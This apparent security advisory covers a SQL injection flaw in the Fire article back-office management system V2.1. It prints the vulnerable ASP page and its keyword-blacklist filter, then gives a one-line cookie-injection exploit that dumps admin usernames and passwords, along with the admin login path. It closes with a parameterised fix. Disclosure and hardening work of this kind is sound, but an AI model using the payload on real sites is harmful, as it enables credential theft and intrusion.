Fire article back office management system V2.1 0day vulnerability warning - the black bar safety net

2011-04-20T00:00:00
ID MYHACK58:62201130132
Type myhack58
Reporter Anonymous
Modified 2011-04-20T00:00:00

Description

The Fire article back office management system uses two-level classification, has a simple and clean interface, and is easy to use; it can automatically upload images remotely, and when an article is deleted its related images are deleted too, so fewer junk files are left behind. Opening article.asp, we find this statement:

    </TR></TBODY></TABLE></TD>
    <TD vAlign=top align=middle width=1 bgColor=#cccccc></TD>
    <TD vAlign=top align=middle width=592 bgColor=#ffffff>
    <% set rs=conn.execute("select * from article where id="&request("id")) %>
    <TABLE cellSpacing=0 cellPadding=6 width="96%" border=0>
    <TBODY>
    <TR>
    <TD class=xx vAlign=bottom height=30>■ <%=rs("classname")%> > <%=rs("title")%></TD>
    </TR></TBODY></TABLE>

The id value is received directly through request("id") and concatenated into the SQL string.

Then see the content

    <!--#include file="admin/Check_SqlIn.asp" -->

Directly open Check_SqlIn.asp:

    <%
    ' SQL universal anti-injection procedure; it only needs to be referenced in conn.asp
    ' or a similar file before the database file is opened
    dim sql_injdata
    SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
    SQL_inj = split(SQL_Injdata,"|")

    If Request.QueryString<>"" Then
        For Each SQL_Get In Request.QueryString
            For SQL_Data=0 To Ubound(SQL_inj)
                if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
                    Response.Write "<Script Language=JavaScript>alert('Warning: do not include illegal characters in the parameters or attempt injection!');history.back(-1)</Script>"
                    Response.end
                end if
            next
        Next
    End If

    If Request.Form<>"" Then
        For Each Sql_Post In Request.Form
            For SQL_Data=0 To Ubound(SQL_inj)
                if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
                    Response.Write "<Script Language=JavaScript>alert('Warning: do not include illegal characters in the parameters or attempt injection!');history.back(-1)</Script>"
                    Response.end
                end if
            next
        next
    end if
    %>

Clearly only the GET (QueryString) and POST (Form) collections are filtered. Because article.asp uses the bare request("id"), which also falls through to the Cookies collection, the check can be bypassed by cookie injection.

Here is the exp:

    javascript:alert(document.cookie="id="+escape("95 and 1=2 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin"));

Admin panel login: /admin/admin_login.asp
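The root cause is the untyped, unparameterised request("id") rather than a gap in the keyword blacklist. The following is an added example (not code from the Fire article system) of how article.asp could be hardened: it reads the id only from the query string, accepts only a plain integer, and binds it as an ADODB parameter. It assumes conn is the open ADODB.Connection created in conn.asp.

```asp
<%
' Added example, not the project's own code: hardened replacement for the
' article.asp query shown above. Assumes "conn" is the open ADODB.Connection
' from conn.asp.
Dim rawId, re, articleId, cmd, rs

' Explicit collection: unlike Request("id"), this never falls through to
' Request.Cookies, so a cookie value cannot reach the SQL statement.
rawId = Request.QueryString("id")

' Whitelist instead of blacklist: one to nine ASCII digits, nothing else.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid article id."
    Response.End
End If
articleId = CLng(rawId)

' Parameterised query: the value is bound as an adInteger input parameter,
' so it is never interpreted as SQL and no keyword filter is needed here.
Set cmd = Server.CreateObject("ADODB.Command")
cmd.ActiveConnection = conn
cmd.CommandText = "SELECT classname, title FROM article WHERE id = ?"
cmd.CommandType = 1                                            ' adCmdText
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, 4, articleId) ' adInteger, adParamInput
Set rs = cmd.Execute

If rs.EOF Then
    Response.Status = "404 Not Found"
    Response.End
End If
%>
<TD class=xx vAlign=bottom height=30>&#9632;
<%=Server.HTMLEncode(rs("classname") & "")%> &gt;
<%=Server.HTMLEncode(rs("title") & "")%></TD>
```

Server.HTMLEncode on the output fields is included because the original page echoes database values into HTML unencoded; the & "" guards against Null values, which HTMLEncode rejects.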

By: dark on formula